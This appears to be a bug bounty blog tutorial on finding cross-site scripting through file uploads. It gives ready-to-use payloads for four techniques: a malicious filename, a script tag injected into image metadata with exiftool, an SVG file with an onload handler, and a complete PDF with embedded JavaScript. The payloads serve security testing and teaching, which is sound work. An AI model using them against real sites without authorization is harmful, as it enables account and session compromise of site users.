Close Menu
    Bug Bounty

    File Upload XSS | Find XSS in a different way while doing Bug bounty and Pentesting

    TheToySecBy Updated:No Comments5 Mins Read

    Hey guys, this is TheToySec, back again with another Post. In this post we will discuss about File uploading XSS and how can we find XSS by just uploading a file while doing bug bounty as well as penetration testing. So without further delay lets start.

     

    So before talking about File upload XSS, lets understand What is XSS?

    XSS is stands for cross site scripting, which is a client side injection vulnerability allows an attacker to put and execute malicious codes in a website from the client side. For more information you can refer to What is XSS and XSS Cheat Sheet.

     

    File Upload XSS

    file upload XSS is a serious chance to find cross-site scripting of a web application.
    As we know majority of the web applications allows clients or their users to upload files for numerous different purposes such as update profile picture, upload pictures, pdfs and other files in the comment etc. and these are a handy chance to find the loopholes on these features. So lets see how to attack these entry points which allows files to upload there, for the purpose of finding XSS.
    There are different types of techniques to check file upload XSS vulnerabilities.
    Find XSS using File Name
    Well, the filename always reflects on the web page when you upload any file, so you can change the filename with XSS payload and try to upload it on the web application. It may happen that XSS can be triggered there. For an example the file name can be “><img src=x onerror=prompt(“XSS”)>.jpg
    If you’re getting any error while creating a file in windows then try in Kali Linux and hopefully no error will be there.
    Find XSS using Meta Data
    So you might be wondering what is this Meta Data?
    Well, Meta Data is simply provide the information of the other data which is attached with the same file.
    Also you can say it is the data of data.
    Now lets create a Meta Data for XSS using Exif tool in Kali Linux.
    Lets check any file now:
    exiftool hello.jpg

    Type the following command for XSS using Exif tool :

    exiftool -Artist='"><script>alert(1)</script>'hello.jpg

     

    Lets confirm the the payload is embedded in the Meta Data or not by following command again:

    exiftool hello.jpg

    In this pic we can confirm the payload is successfully embedded. Well in my case I created a random image file named hello.jpg, you can create any name and embed any payload.

     

    Find XSS by uploading SVG file

    If the web application allows to uploading SVG file extension, which is also an image type, then we can simply try out to embed the XSS payload through SVG file.

    Here’s how we can Make a SVG file and Embed the payload for XSS

    Copy and paste the following code:

    <?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg onload="alert(1)"

    Now save it as a SVG file extension e.g. XSS.svg and upload it in that web application where SVG file is allowed, If there is no proper sanitizations SVG files then hopefully you’ll get a XSS!

     

    Find XSS by uploading PDF

    If there is a feature to upload the PDF File, then we can simply try out to embed the XSS payload through PDF file.

    Here’s how we can Make a PDF file and Embed the payload for XSS.

    Copy and paste the following code:

    %PDF-1.3
% 
1 0 obj
<</Pages 2 0 R /Type /Catalog>>
endobj
2 0 obj
<</Count 1 /Kids [3 0 R] /Type /Pages>>
endobj
3 0 obj
<</AA
<</O
<</JS
(
try {
app.alert\("Hacked by none"\)
} catch \(e\) {
app.alert\(e.message\);
}
) 
/S /JavaScript>>>>
/Annots [] /Contents 4 0 R /MediaBox [0 0 612 792] /Parent 2 0 R
/Resources
<</Font <</F1 <</BaseFont /Helvetica /Subtype /Type1 /Type /Font>>>>>>
/Type /Page>>
endobj
4 0 obj
<</Length 21>>
stream

BT
/F1 24 Tf
ET

endstream
endobj
xref
0 5
0000000000 65535 f
0000000015 00000 n
0000000062 00000 n
0000000117 00000 n
0000000424 00000 n
trailer

<</Root 1 0 R /Size 5>>
startxref
493
%%EOF

    Now save it as a PDF file extension e.g. poc-1.pdf and upload it in that web application where PDF file is allowed, If there is no proper sanitizations for PDF files then hopefully you’ll get a XSS!

     

    Disclaimer: Hackerinthehouse, it’s author and it’s affiliates won’t be responsible for any actions made by you. If you’ll do anything illegal by the help of this article then you might be caught and at that time do not use the name ToySec, ha ha ha 😂😂, Just Kidding. This article is published for security research and education purposes only. It is the end user’s responsibility to obey all applicable local, state and federal laws.

     

    If you really like this post then give your reaction and don’t forget to share with others. Till then we will meet again in another interesting topic.

    Follow me here: https://www.linkedin.com/in/soumyaranjanpradhan/

    Thank you for reading this article and have a nice stay there! 

    Author

    Share.

    Related Posts

    Add A Comment
    Leave A Reply